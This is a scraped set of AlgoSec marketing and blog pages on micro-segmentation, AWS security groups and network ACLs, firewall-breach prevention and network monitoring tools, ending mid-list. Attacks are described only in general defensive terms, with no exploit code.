reduce risk and process changes at zero-touch across the hybrid network.   AlgoSec’s patented application-centric view of the hybrid network enables business owners, application owners, and information security professionals to talk the same language, so organizations can deliver business applications faster while achieving a heightened security posture.  Over 1,800 of the world’s leading organizations trust AlgoSec to help secure their most critical workloads across public cloud, private cloud, containers, and on-premises networks, while taking advantage of almost two decades of leadership in Network Security Policy Management.  See what securely accelerating your digital transformation, move-to-cloud, infrastructure modernization, or micro-segmentation initiatives looks like at www.algosec.com Want to learn more about how AlgoSec can help enable micro-segmentation? Schedule a demo. Schedule a Demo Select a size Overview What is Micro segmentation Why Micro-segment? The SDN Solution What is a Good Filtering Policy A Blueprint for Creating a Micro-segmentation Policy Enabling Micro-segmentation with AlgoSec About AlgoSec Get the latest insights from the experts Choose a better way to manage your network

  • AlgoSec application discovery Enhance the discovery of your network applications | AlgoSec

    Streamline network management with AlgoSec Application Discovery. Gain visibility into application connectivity to optimize performance and enhance security policies. AlgoSec application discovery Enhance the discovery of your network applications ---- ------- Schedule a Demo Select a size ----- Get the latest insights from the experts Choose a better way to manage your network

  • Master the Zero Trust strategy for improved cybersecurity | AlgoSec

    Learn best practices to secure your cloud environment and deliver applications securely Webinars Master the Zero Trust strategy for improved cybersecurity Learn how to implement zero trust security into your business In today’s digital world, cyber threats are becoming more complex and sophisticated. Businesses must adopt a proactive approach to cybersecurity to protect their sensitive data and systems. This is where zero trust security comes in – a security model that requires every user, device, and application to be verified before granting access. If you’re looking to implement zero trust security in your business or want to know more about how it works, you’ll want to watch this webinar. AlgoSec co-Founder and CTO Avishai Wool will discuss the benefits of zero trust security and provide you with practical tips on how to implement this security model in your organization. March 15, 2023 Prof. Avishai Wool CTO & Co Founder AlgoSec Relevant resources Protecting Your Network’s Precious Jewels with Micro-Segmentation, Kyle Wickert, AlgoSec Watch Video Professor Wool - Introduction to Microsegmentation Watch Video Five Practical Steps to Implementing a Zero-Trust Network Keep Reading Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • AlgoSec | NACL best practices: How to combine security groups with network ACLs effectively

    Like all modern cloud providers, Amazon adopts the shared responsibility model for cloud security. Amazon guarantees secure... AWS NACL best practices: How to combine security groups with network ACLs effectively Prof. Avishai Wool 2 min read Prof. Avishai Wool Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/28/23 Published Like all modern cloud providers, Amazon adopts the shared responsibility model for cloud security. Amazon guarantees secure infrastructure for Amazon Web Services, while AWS users are responsible for maintaining secure configurations. That requires using multiple AWS services and tools to manage traffic. You’ll need to develop a set of inbound rules for incoming connections between your Amazon Virtual Private Cloud (VPC) and all of its Elastic Compute (EC2) instances and the rest of the Internet. You’ll also need to manage outbound traffic with a series of outbound rules. Your Amazon VPC provides you with several tools to do this. The two most important ones are security groups and Network Access Control Lists (NACLs). Security groups are stateful firewalls that secure inbound traffic for individual EC2 instances. Network ACLs are stateless firewalls that secure inbound and outbound traffic for VPC subnets. Managing AWS VPC security requires configuring both of these tools appropriately for your unique security risk profile. This means planning your security architecture carefully to align it the rest of your security framework. For example, your firewall rules impact the way Amazon Identity Access Management (IAM) handles user permissions. Some (but not all) IAM features can be implemented at the network firewall layer of security. Before you can manage AWS network security effectively , you must familiarize yourself with how AWS security tools work and what sets them apart. Everything you need to know about security groups vs NACLs AWS security groups explained: Every AWS account has a single default security group assigned to the default VPC in every Region. It is configured to allow inbound traffic from network interfaces assigned to the same group, using any protocol and any port. It also allows all outbound traffic using any protocol and any port. Your default security group will also allow all outbound IPv6 traffic once your VPC is associated with an IPv6 CIDR block. You can’t delete the default security group, but you can create new security groups and assign them to AWS EC2 instances. Each security group can only contain up to 60 rules, but you can set up to 2500 security groups per Region. You can associate many different security groups to a single instance, potentially combining hundreds of rules. These are all allow rules that allow traffic to flow according the ports and protocols specified. For example, you might set up a rule that authorizes inbound traffic over IPv6 for linux SSH commands and sends it to a specific destination. This could be different from the destination you set for other TCP traffic. Security groups are stateful, which means that requests sent from your instance will be allowed to flow regardless of inbound traffic rules. Similarly, VPC security groups automatically responses to inbound traffic to flow out regardless of outbound rules. However, since security groups do not support deny rules, you can’t use them to block a specific IP address from connecting with your EC2 instance. Be aware that Amazon EC2 automatically blocks email traffic on port 25 by default – but this is not included as a specific rule in your default security group. AWS NACLs explained: Your VPC comes with a default NACL configured to automatically allow all inbound and outbound network traffic. Unlike security groups, NACLs filter traffic at the subnet level. That means that Network ACL rules apply to every EC2 instance in the subnet, allowing users to manage AWS resources more efficiently. Every subnet in your VPC must be associated with a Network ACL. Any single Network ACL can be associated with multiple subnets, but each subnet can only be assigned to one Network ACL at a time. Every rule has its own rule number, and Amazon evaluates rules in ascending order. The most important characteristic of NACL rules is that they can deny traffic. Amazon evaluates these rules when traffic enters or leaves the subnet – not while it moves within the subnet. You can access more granular data on data flows using VPC flow logs. Since Amazon evaluates NACL rules in ascending order, make sure that you place deny rules earlier in the table than rules that allow traffic to multiple ports. You will also have to create specific rules for IPv4 and IPv6 traffic – AWS treats these as two distinct types of traffic, so rules that apply to one do not automatically apply to the other. Once you start customizing NACLs, you will have to take into account the way they interact with other AWS services. For example, Elastic Load Balancing won’t work if your NACL contains a deny rule excluding traffic from 0.0.0.0/0 or the subnet’s CIDR. You should create specific inclusions for services like Elastic Load Balancing, AWS Lambda, and AWS CloudWatch. You may need to set up specific inclusions for third-party APIs, as well. You can create these inclusions by specifying ephemeral port ranges that correspond to the services you want to allow. For example, NAT gateways use ports 1024 to 65535. This is the same range covered by AWS Lambda functions, but it’s different than the range used by Windows operating systems. When creating these rules, remember that unlike security groups, NACLs are stateless. That means that when responses to allowed traffic are generated, those responses are subject to NACL rules. Misconfigured NACLs deny traffic responses that should be allowed, leading to errors, reduced visibility, and potential security vulnerabilities . How to configure and map NACL associations A major part of optimizing NACL architecture involves mapping the associations between security groups and NACLs. Ideally, you want to enforce a specific set of rules at the subnet level using NACLs, and a different set of instance-specific rules at the security group level. Keeping these rulesets separate will prevent you from setting inconsistent rules and accidentally causing unpredictable performance problems. The first step in mapping NACL associations is using the Amazon VPC console to find out which NACL is associated with a particular subnet. Since NACLs can be associated with multiple subnets, you will want to create a comprehensive list of every association and the rules they contain. To find out which NACL is associated with a subnet: Open the Amazon VPC console . Select Subnets in the navigation pane. Select the subnet you want to inspect. The Network ACL tab will display the ID of the ACL associated with that network, and the rules it contains. To find out which subnets are associated with a NACL: Open the Amazon VPC console . Select Network ACLS in the navigation pane. Click over to the column entitled Associated With. Select a Network ACL from the list. Look for Subnet associations on the details pane and click on it. The pane will show you all subnets associated with the selected Network ACL. Now that you know how the difference between security groups and NACLs and you can map the associations between your subnets and NACLs, you’re ready to implement some security best practices that will help you strengthen and simplify your network architecture. 5 best practices for AWS NACL management Pay close attention to default NACLs, especially at the beginning Since every VPC comes with a default NACL, many AWS users jump straight into configuring their VPC and creating subnets, leaving NACL configuration for later. The problem here is that every subnet associated with your VPC will inherit the default NACL. This allows all traffic to flow into and out of the network. Going back and building a working security policy framework will be difficult and complicated – especially if adjustments are still being made to your subnet-level architecture. Taking time to create custom NACLs and assign them to the appropriate subnets as you go will make it much easier to keep track of changes to your security posture as you modify your VPC moving forward. Implement a two-tiered system where NACLs and security groups complement one another Security groups and NACLs are designed to complement one another, yet not every AWS VPC user configures their security policies accordingly. Mapping out your assets can help you identify exactly what kind of rules need to be put in place, and may help you determine which tool is the best one for each particular case. For example, imagine you have a two-tiered web application with web servers in one security group and a database in another. You could establish inbound NACL rules that allow external connections to your web servers from anywhere in the world (enabling port 443 connections) while strictly limiting access to your database (by only allowing port 3306 connections for MySQL). Look out for ineffective, redundant, and misconfigured deny rules Amazon recommends placing deny rules first in the sequential list of rules that your NACL enforces. Since you’re likely to enforce multiple deny rules per NACL (and multiple NACLs throughout your VPC), you’ll want to pay close attention to the order of those rules, looking for conflicts and misconfigurations that will impact your security posture. Similarly, you should pay close attention to the way security group rules interact with your NACLs. Even misconfigurations that are harmless from a security perspective may end up impacting the performance of your instance, or causing other problems. Regularly reviewing your rules is a good way to prevent these mistakes from occurring. Limit outbound traffic to the required ports or port ranges When creating a new NACL, you have the ability to apply inbound or outbound restrictions. There may be cases where you want to set outbound rules that allow traffic from all ports. Be careful, though. This may introduce vulnerabilities into your security posture. It’s better to limit access to the required ports, or to specify the corresponding port range for outbound rules. This establishes the principle of least privilege to outbound traffic and limits the risk of unauthorized access that may occur at the subnet level. Test your security posture frequently and verify the results How do you know if your particular combination of security groups and NACLs is optimal? Testing your architecture is a vital step towards making sure you haven’t left out any glaring vulnerabilities. It also gives you a good opportunity to address misconfiguration risks. This doesn’t always mean actively running penetration tests with experienced red team consultants, although that’s a valuable way to ensure best-in-class security. It also means taking time to validate your rules by running small tests with an external device. Consider using AWS flow logs to trace the way your rules direct traffic and using that data to improve your work. How to diagnose security group rules and NACL rules with flow logs Flow logs allow you to verify whether your firewall rules follow security best practices effectively. You can follow data ingress and egress and observe how data interacts with your AWS security rule architecture at each step along the way. This gives you clear visibility into how efficient your route tables are, and may help you configure your internet gateways for optimal performance. Before you can use the Flow Log CLI, you will need to create an IAM role that includes a policy granting users the permission to create, configure, and delete flow logs. Flow logs are available at three distinct levels, each accessible through its own console: Network interfaces VPCs Subnets You can use the ping command from an external device to test the way your instance’s security group and NACLs interact. Your security group rules (which are stateful) will allow the response ping from your instance to go through. Your NACL rules (which are stateless) will not allow the outbound ping response to travel back to your device. You can look for this activity through a flow log query. Here is a quick tutorial on how to create a flow log query to check your AWS security policies. First you’ll need to create a flow log in the AWS CLI. This is an example of a flow log query that captures all rejected traffic for a specified network interface. It delivers the flow logs to a CloudWatch log group with permissions specified in the IAM role: aws ec2 create-flow-logs \ –resource-type NetworkInterface \ –resource-ids eni-1235b8ca123456789 \ –traffic-type ALL \ –log-group-name my-flow-logs \ –deliver-logs-permission-arn arn:aws:iam::123456789101:role/publishFlowLogs Assuming your test pings represent the only traffic flowing between your external device and EC2 instance, you’ll get two records that look like this: 2 123456789010 eni-1235b8ca123456789 203.0.113.12 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK 2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 0 0 1 4 336 1432917094 1432917142 REJECT OK To parse this data, you’ll need to familiarize yourself with flow log syntax. Default flow log records contain 14 arguments, although you can also expand custom queries to return more than double that number: Version tells you the version currently in use. Default flow logs requests use Version 2. Expanded custom requests may use Version 3 or 4. Account-id tells you the account ID of the owner of the network interface that traffic is traveling through. The record may display as unknown if the network interface is part of an AWS service like a Network Load Balancer. Interface-id shows the unique ID of the network interface for the traffic currently under inspection. Srcaddr shows the source of incoming traffic, or the address of the network interface for outgoing traffic. In the case of IPv4 addresses for network interfaces, it is always its private IPv4 address. Dstaddr shows the destination of outgoing traffic, or the address of the network interface for incoming traffic. In the case of IPv4 addresses for network interfaces, it is always its private IPv4 address. Srcport is the source port for the traffic under inspection. Dstport is the destination port for the traffic under inspection. Protocol refers to the corresponding IANA traffic protocol number . Packets describes the number of packets transferred. Bytes describes the number of bytes transferred. Start shows the start time when the first data packet was received. This could be up to one minute after the network interface transmitted or received the packet. End shows the time when the last data packet was received. This can be up to one minutes after the network interface transmitted or received the data packet. Action describes what happened to the traffic under inspection: ACCEPT means that traffic was allowed to pass. REJECT means the traffic was blocked, typically by security groups or NACLs. Log-status confirms the status of the flow log: OK means data is logging normally. NODATA means no network traffic to or from the network interface was detected during the specified interval. SKIPDATA means some flow log records are missing, usually due to internal capacity restraints or other errors. Going back to the example above, the flow log output shows that a user sent a command from a device with the IP address 203.0.113.12 to the network interface’s private IP address, which is 172.31.16.139. The security group’s inbound rules allowed the ICMP traffic to travel through, producing an ACCEPT record. However, the NACL did not let the ping response go through, because it is stateless. This generated the REJECT record that followed immediately after. If you configure your NACL to permit output ICMP traffic and run this test again, the second flow log record will change to ACCEPT. azon Web Services (AWS) is one of the most popular options for organizations looking to migrate their business applications to the cloud. It’s easy to see why: AWS offers high capacity, scalable and cost-effective storage, and a flexible, shared responsibility approach to security. Essentially, AWS secures the infrastructure, and you secure whatever you run on that infrastructure. However, this model does throw up some challenges. What exactly do you have control over? How can you customize your AWS infrastructure so that it isn’t just secure today, but will continue delivering robust, easily managed security in the future? The basics: security groups AWS offers virtual firewalls to organizations, for filtering traffic that crosses their cloud network segments. The AWS firewalls are managed using a concept called Security Groups. These are the policies, or lists of security rules, applied to an instance – a virtualized computer in the AWS estate. AWS Security Groups are not identical to traditional firewalls, and they have some unique characteristics and functionality that you should be aware of, and we’ve discussed them in detail in video lesson 1: the fundamentals of AWS Security Groups , but the crucial points to be aware of are as follows. First, security groups do not deny traffic – that is, all the rules in security groups are positive, and allow traffic. Second, while security group rules can be set to specify a traffic source, or a destination, they cannot specify both on the same rule. This is because AWS always sets the unspecified side (source or destination) as the instance to which the group is applied. Finally, single security groups can be applied to multiple instances, or multiple security groups can be applied to a single instance: AWS is very flexible. This flexibility is one of the unique benefits of AWS, allowing organizations to build bespoke security policies across different functions and even operating systems, mixing and matching them to suit their needs. Adding Network ACLs into the mix To further enhance and enrich its security filtering capabilities AWS also offers a feature called Network Access Control Lists (NACLs). Like security groups, each NACL is a list of rules, but there are two important differences between NACLs and security groups. The first difference is that NACLs are not directly tied to instances, but are tied with the subnet within your AWS virtual private cloud that contains the relevant instance. This means that the rules in a NACL apply to all of the instances within the subnet, in addition to all the rules from the security groups. So a specific instance inherits all the rules from the security groups associated with it, plus the rules associated with a NACL which is optionally associated with a subnet containing that instance. As a result NACLs have a broader reach, and affect more instances than a security group does. The second difference is that NACLs can be written to include an explicit action, so you can write ‘deny’ rules – for example to block traffic from a particular set of IP addresses which are known to be compromised. The ability to write ‘deny’ actions is a crucial part of NACL functionality. It’s all about the order As a consequence, when you have the ability to write both ‘allow’ rules and ‘deny’ rules, the order of the rules now becomes important. If you switch the order of the rules between a ‘deny’ and ‘allow’ rule, then you’re potentially changing your filtering policy quite dramatically. To manage this, AWS uses the concept of a ‘rule number’ within each NACL. By specifying the rule number, you can identify the correct order of the rules for your needs. You can choose which traffic you deny at the outset, and which you then actively allow. As such, with NACLs you can manage security tasks in a way that you cannot do with security groups alone. However, we did point out earlier that an instance inherits security rules from both the security groups, and from the NACLs – so how do these interact? The order by which rules are evaluated is this; For inbound traffic, AWS’s infrastructure first assesses the NACL rules. If traffic gets through the NACL, then all the security groups that are associated with that specific instance are evaluated, and the order in which this happens within and among the security groups is unimportant because they are all ‘allow’ rules. For outbound traffic, this order is reversed: the traffic is first evaluated against the security groups, and then finally against the NACL that is associated with the relevant subnet. You can see me explain this topic in person in my new whiteboard video: Schedule a demo Related Articles Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Convergence didn’t fail, compliance did. Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec | How To Prevent Firewall Breaches (The 2024 Guide)

    Properly configured firewalls are vital in any comprehensive cybersecurity strategy. However, even the most robust configurations can be... Uncategorized How To Prevent Firewall Breaches (The 2024 Guide) Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 1/11/24 Published Properly configured firewalls are vital in any comprehensive cybersecurity strategy. However, even the most robust configurations can be vulnerable to exploitation by attackers. No single security measure can offer absolute protection against all cyber threats and data security risks . To mitigate these risks, it’s crucial to understand how cybercriminals exploit firewall vulnerabilities. The more you know about their tactics, techniques, and procedures, the better-equipped you are to implement security policies that successfully block unauthorized access to network assets. In this guide, you’ll understand the common cyber threats that target enterprise firewall systems with the goal of helping you understand how attackers exploit misconfigurations and human vulnerabilities. Use this information to protect your network from a firewall breach. Understanding 6 Tactics Cybercriminals Use to Breach Firewalls 1. DNS Leaks Your firewall’s primary use is making sure unauthorized users do not gain access to your private network and the sensitive information it contains. But firewall rules can go both ways – preventing sensitive data from leaving the network is just as important. If enterprise security teams neglect to configure their firewalls to inspect outgoing traffic, cybercriminals can intercept this traffic and use it to find gaps in your security systems. DNS traffic is particularly susceptible to this approach because it shows a list of websites users on your network regularly visit. A hacker could use this information to create a spoofed version of a frequently visited website. For example, they might notice your organization’s employees visit a third-party website to attend training webinars. Registering a fake version of the training website and collecting employee login credentials would be simple. If your firewall doesn’t inspect DNS data and confirm connections to new IP addresses, you may never know. DNS leaks may also reveal the IP addresses and endpoint metadata of the device used to make an outgoing connection. This would give cybercriminals the ability to see what kind of hardware your organization’s employees use to connect to external websites. With that information in hand, impersonating managed service providers or other third-party partners is easy. Some DNS leaks even contain timestamp data, telling attackers exactly when users requested access to external web assets. How to protect yourself against DNS leaks Proper firewall configuration is key to preventing DNS-related security incidents. Your organization’s firewalls should provide observability and access control to both incoming and outgoing traffic. Connections to servers known for hosting malware and cybercrime assets should be blocked entirely. Connections to servers without a known reputation should be monitored closely. In a Zero Trust environment , even connections to known servers should benefit from scrutiny using an identity-based security framework. Don’t forget that apps can connect to external resources, too. Consider deploying web application firewalls configured to prevent DNS leaks when connecting to third-party assets and servers. You may also wish to update your security policy to require employees to use VPNs when connecting to external resources. An encrypted VPN connection can prevent DNS information from leaking, making it much harder for cybercriminals to conduct reconnaissance on potential targets using DNS data. 2. Encrypted Injection Attacks Older, simpler firewalls analyze traffic by looking at different kinds of data packet metadata. This provides clear evidence of certain denial-of-service attacks, clear violations of network security policy , and some forms of malware and ransomware . They do not conduct deep packet inspection to identify the kind of content passing through the firewall. This provides cybercriminals with an easy way to bypass firewall rules and intrusion prevention systems – encryption . If malicious content is encrypted before it hits the firewall, it may go unnoticed by simple firewall rules. Only next-generation firewalls capable of handling encrypted data packets can determine whether this kind of traffic is secure or not. Cybercriminals often deliver encrypted injection attacks through email. Phishing emails may trick users into clicking on a malicious link that injects encrypted code into the endpoint device. The script won’t decode and run until after it passes the data security threshold posed by the firewall. After that, it is free to search for personal data, credit card information, and more. Many of these attacks will also bypass antivirus controls that don’t know how to handle encrypted data. Task automation solutions like Windows PowerShell are also susceptible to these kinds of attacks. Even sophisticated detection-based security solutions may fail to recognize encrypted injection attacks if they don’t have the keys necessary to decrypt incoming data. How to protect yourself against encrypted injection attacks Deep packet inspection is one of the most valuable features next-generation firewalls provide to security teams. Industry-leading firewall vendors equip their products with the ability to decrypt and inspect traffic. This allows the firewall to prevent malicious content from entering the network through encrypted traffic, and it can also prevent sensitive encrypted data – like login credentials – from leaving the network. These capabilities are unique to next-generation firewalls and can’t be easily replaced with other solutions. Manufacturers and developers have to equip their firewalls with public-key cryptography capabilities and obtain data from certificate authorities in order to inspect encrypted traffic and do this. 3. Compromised Public Wi-Fi Public Wi-Fi networks are a well-known security threat for individuals and organizations alike. Anyone who logs into a password-protected account on public Wi-Fi at an airport or coffee shop runs the risk of sending their authentication information directly to hackers. Compromised public Wi-Fi also presents a lesser-known threat to security teams at enterprise organizations – it may help hackers breach firewalls. If a remote employee logs into a business account or other asset from a compromised public Wi-Fi connection, hackers can see all the data transmitted through that connection. This may give them the ability to steal account login details or spoof endpoint devices and defeat multi-factor authentication. Even password-protected private Wi-Fi connections can be abused in this way. Some Wi-Fi networks still use outdated WEP and WPA security protocols that have well-known vulnerabilities. Exploiting these weaknesses to take control of a WEP or WPA-protected network is trivial for hackers. The newer WPA2 and WPA3 standards are much more resilient against these kinds of attacks. While public Wi-Fi dangers usually bring remote workers and third-party service vendors to mind, on-premises networks are just as susceptible. Nothing prevents a hacker from gaining access to public Wi-Fi networks in retail stores, receptions, or other areas frequented by customers and employees. How to protect yourself against compromised public Wi-Fi attacks First, you must enforce security policies that only allow Wi-Fi traffic secured by WPA2 and WPA3 protocols. Hardware Wi-Fi routers that do not support these protocols must be replaced. This grants a minimum level of security to protected Wi-Fi networks. Next, all remote connections made over public Wi-Fi networks must be made using a secure VPN. This will encrypt the data that the public Wi-Fi router handles, making it impossible for a hacker to intercept without gaining access to the VPN’s secret decryption key. This doesn’t guarantee your network will be safe from attacks, but it improves your security posture considerably. 4. IoT Infrastructure Attacks Smartwatches, voice-operated speakers, and many automated office products make up the Internet of Things (IoT) segment of your network. Your organization may be using cloud-enriched access control systems, cost-efficient smart heating systems, and much more. Any Wi-Fi-enabled hardware capable of automation can safely be included in this category. However, these devices often fly under the radar of security team’s detection tools, which often focus on user traffic. If hackers compromise one of these devices, they may be able to move laterally through the network until they arrive at a segment that handles sensitive information. This process can take time, which is why many incident response teams do not consider suspicious IoT traffic to be a high-severity issue. IoT endpoints themselves rarely process sensitive data on their own, so it’s easy to overlook potential vulnerabilities and even ignore active attacks as long as the organization’s mission-critical assets aren’t impacted. However, hackers can expand their control over IoT devices and transform them into botnets capable of running denial-of-service attacks. These distributed denial-of-service (DDoS) attacks are much larger and more dangerous, and they are growing in popularity among cybercriminals. Botnet traffic associated with DDoS attacks on IoT networks has increased five-fold over the past year , showing just how promising it is for hackers. How to protect yourself against IoT infrastructure attacks Proper network segmentation is vital for preventing IoT infrastructure attacks . Your organization’s IoT devices should be secured on a network segment that is isolated from the rest of the network. If attackers do compromise the entire network, you should be protected from the risk of losing sensitive data from critical business assets. Ideally, this protection will be enforced with a strong set of firewalls managing the connection between your IoT subnetwork and the rest of your network. You may need to create custom rules that take your unique security risk profile and fleet of internet-connected devices into account. There are very few situations in which one-size-fits-all rulemaking works, and this is not one of them. All IoT devices – no matter how small or insignificant – should be protected by your firewall and other cybersecurity solutions . Never let these devices connect directly to the Internet through an unsecured channel. If they do, they provide attackers with a clear path to circumvent your firewalls and gain access to the rest of your network with ease. 5. Social Engineering and Phishing Social engineering attacks refer to a broad range of deceptive practices used by hackers to gain access to victims’ assets. What makes this approach special is that it does not necessarily depend on technical expertise. Instead of trying to hack your systems, cybercriminals are trying to hack your employees and company policies to carry out their attacks. Email phishing is one of the most common examples. In a typical phishing attack , hackers may spoof an email server to make it look like they are sending emails from a high-level executive in the company you work for. They can then impersonate this executive and demand junior accountants pay fictitious invoices or send sensitive customer data to email accounts controlled by threat actors. Other forms of social engineering can use your organization’s tech support line against itself. Attackers may pretend to represent large customer accounts and will leverage this ruse to gain information about how your company works. They may impersonate a third-party vendor and request confidential information that the vendor would normally have access to. These attacks span the range from simple trickery to elaborate confidence scams. Protecting against them can be incredibly challenging, and your firewall capabilities can make a significant difference in your overall state of readiness. How to protect yourself against social engineering attacks Employee training is the top priority for protecting against social engineering attacks . When employees understand the company’s operating procedures and security policies, it’s much harder for social engineers to trick them. Ideally, training should also include in-depth examples of how phishing attacks work, what they look like, and what steps employees should take when contacted by people they don’t trust. 6. Sandbox Exploits Many organizations use sandbox solutions to prevent file-based malware attacks. Sandboxes work by taking suspicious files and email attachments and opening them in a secure virtual environment before releasing them to users. The sandbox solution will observe how the file behaves and quarantine any file that shows malicious activity. In theory, this provides a powerful layer of defense against file-based attacks. But in practice, cybercriminals are well aware of how to bypass these solutions. For example, many sandbox solutions can’t open files over a certain size. Hackers who attach malicious code to large files can easily get through. Additionally, many forms of malware do not start executing malicious tasks the second they are activated. This delay can provide just enough of a buffer to get through a sandbox system. Some sophisticated forms of malware can even detect when they are being run in a sandbox environment – and will play the part of an innocent program until they are let loose inside the network. How to protect yourself against sandbox exploits Many next-generation firewalls include cloud-enabled sandboxing capable of running programs of arbitrary size for a potentially unlimited amount of time. More sophisticated sandbox solutions go to great lengths to mimic the system specifications of an actual endpoint so malware won’t know it is being run in a virtual environment. Organizations may also be able to overcome the limitations of the sandbox approach using Content Disarm and Reconstruction (CDR) techniques. This approach keeps potentially malicious files off the network entirely and only allows a reconstructed version of the file to enter the network. Since the new file is constructed from scratch, it will not contain any malware that may have been attached to the original file. Prevent firewall breaches with AlgoSec Managing firewalls manually can be overwhelming and time-consuming – especially when dealing with multiple firewall solutions. With the help of a firewall management solution , you easily configure firewall rules and manage configurations from a single dashboard. AlgoSec’s powerful firewall management solution integrates with your firewalls to deliver unified firewall policy management from a single location, thus streamlining the entire process. With AlgoSec, you can maintain clear visibility of your firewall ruleset, automate the management process, assess risk & optimize rulesets, streamline audit preparation & ensure compliance, and use APIs to access many features through web services. Schedule a demo Related Articles Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Convergence didn’t fail, compliance did. Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec | Top 9 Network Security Monitoring Tools for Identifying Potential Threats

    What is Network Security Monitoring? Network security monitoring is the process of inspecting network traffic and IT infrastructure for... Network Security Top 9 Network Security Monitoring Tools for Identifying Potential Threats Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 2/4/24 Published What is Network Security Monitoring? Network security monitoring is the process of inspecting network traffic and IT infrastructure for signs of security issues. These signs can provide IT teams with valuable information about the organization’s cybersecurity posture. For example, security teams may notice unusual changes being made to access control policies. This may lead to unexpected traffic flows between on-premises systems and unrecognized web applications. This might provide early warning of an active cyberattack, giving security teams enough time to conduct remediation efforts and prevent data loss . Detecting this kind of suspicious activity without the visibility that network security monitoring provides would be very difficult. These tools and policies enhance operational security by enabling network intrusion detection, anomaly detection, and signature-based detection. Full-featured network security monitoring solutions help organizations meet regulatory compliance requirements by maintaining records of network activity and security incidents. This gives analysts valuable data for conducting investigations into security events and connect seemingly unrelated incidents into a coherent timeline. What To Evaluate in a Network Monitoring Software Provider Your network monitoring software provider should offer a comprehensive set of features for collecting, analyzing, and responding to suspicious activity anywhere on your network. It should unify management and control of your organization’s IT assets while providing unlimited visibility into how they interact with one another. Comprehensive alerting and reporting Your network monitoring solution must notify you of security incidents and provide detailed reports describing those incidents in real-time. It should include multiple toolsets for collecting performance metrics, conducting in-depth analysis, and generating compliance reports. Future-proof scalability Consider what kind of network monitoring needs your organization might have several years from now. If your monitoring tool cannot scale to accommodate that growth, you may end up locked into a vendor agreement that doesn’t align with your interests. This is especially true with vendors that prioritize on-premises implementations since you run the risk of paying for equipment and services that you don’t actually use. Cloud-delivered software solutions often perform better in use cases where flexibility is important. Integration with your existing IT infrastructure Your existing security tech stack may include a selection of SIEM platforms, IDS/IPS systems, firewalls , and endpoint security solutions. Your network security monitoring software will need to connect all of these tools and platforms together in order to grant visibility into network traffic flows between them. Misconfigurations and improper integrations can result in dangerous security vulnerabilities. A high-performance vulnerability scanning solution may be able to detect these misconfigurations so you can fix them proactively. Intuitive user experience for security teams and IT admins Complex tools often come with complex management requirements. This can create a production bottleneck when there aren’t enough fully-trained analysts on the IT security team. Monitoring tools designed for ease of use can improve security performance by reducing training costs and allowing team members to access monitoring insights more easily. Highly automated tools can drive even greater performance benefits by reducing the need for manual control altogether. Excellent support and documentation Deploying network security monitoring tools is not always a straightforward task. Most organizations will need to rely on expert support to assist with implementation, troubleshooting, and ongoing maintenance. Some vendors provide better technical support to customers than others, and this difference is often reflected in the price. Some organizations work with managed service providers who can offset some of their support and documentation needs by providing on-demand expertise when needed. Pricing structures that work for you Different vendors have different pricing structures. When comparing network monitoring tools, consider the total cost of ownership including licensing fees, hardware requirements, and any additional costs for support or updates. Certain usage models will fit your organization’s needs better than others, and you’ll have to document them carefully to avoid overpaying. Compliance and reporting capabilities If you plan on meeting compliance requirements for your organization, you will need a network security monitoring tool that can generate the necessary reports and logs to meet these standards. Every set of standards is different, but many reputable vendors offer solutions for meeting specific compliance criteria. Find out if your network security monitoring vendor supports compliance standards like PCI DSS, HIPAA, and NIST. A good reputation for customer success Research the reputation and track record of every vendor you could potentially work with. Every vendor will tell you that they are the best – ask for evidence to back up their claims. Vendors with high renewal rates are much more likely to provide you with valuable security technology than lower-priced competitors with a significant amount of customer churn. Pay close attention to reviews and testimonials from independent, trustworthy sources. Compatibility with network infrastructure Your network security monitoring tool must be compatible with the entirety of your network infrastructure. At the most basic level, it must integrate with your hardware fleet of routers, switches, and endpoint devices. If you use devices with non-compatible operating systems, you risk introducing blind spots into your security posture. For the best results, you must enjoy in-depth observability for every hardware and software asset in your network, from the physical layer to the application layer. Regular updates and maintenance Updates are essential to keep security tools effective against evolving threats. Check the update frequency of any monitoring tool you consider implementing and look for the specific security vulnerabilities addressed in those updates. If there is a significant delay between the public announcement of new vulnerabilities and the corresponding security patch, your monitoring tools may be vulnerable during that period of time. 9 Best Network Security Monitoring Providers for Identifying Cybersecurity Threats 1. AlgoSec AlgoSec is a network security policy management solution that helps organizations automate and orchestrate network security policies. It keeps firewall rules , routers, and other security devices configured correctly, ensuring network assets are secured properly. AlgoSec protects organizations from misconfigurations that can lead to malware, ransomware, and phishing attacks, and gives security teams the ability to proactively simulate changes to their IT infrastructure. 2. SolarWinds SolarWinds offers a range of network management and monitoring solutions, including network security monitoring tools that detect changes to security policies and traffic flows. It provides tools for network visibility and helps identify and respond to security incidents. However, SolarWinds can be difficult for some organizations to deploy because customers must purchase additional on-premises hardware. 3. Security Onion Security Onion is an open-source Linux distribution designed for network security monitoring. It integrates multiple monitoring tools like Snort, Suricata, Bro, and others into a single platform, making it easier to set up and manage a comprehensive network security monitoring solution. As an open-source option, it is one of the most cost-effective solutions available on the market, but may require additional development resources to customize effectively for your organization’s needs. 4. ELK Stack Elastic ELK Stack is a combination of three open-source tools: Elasticsearch, Logstash, and Kibana. It’s 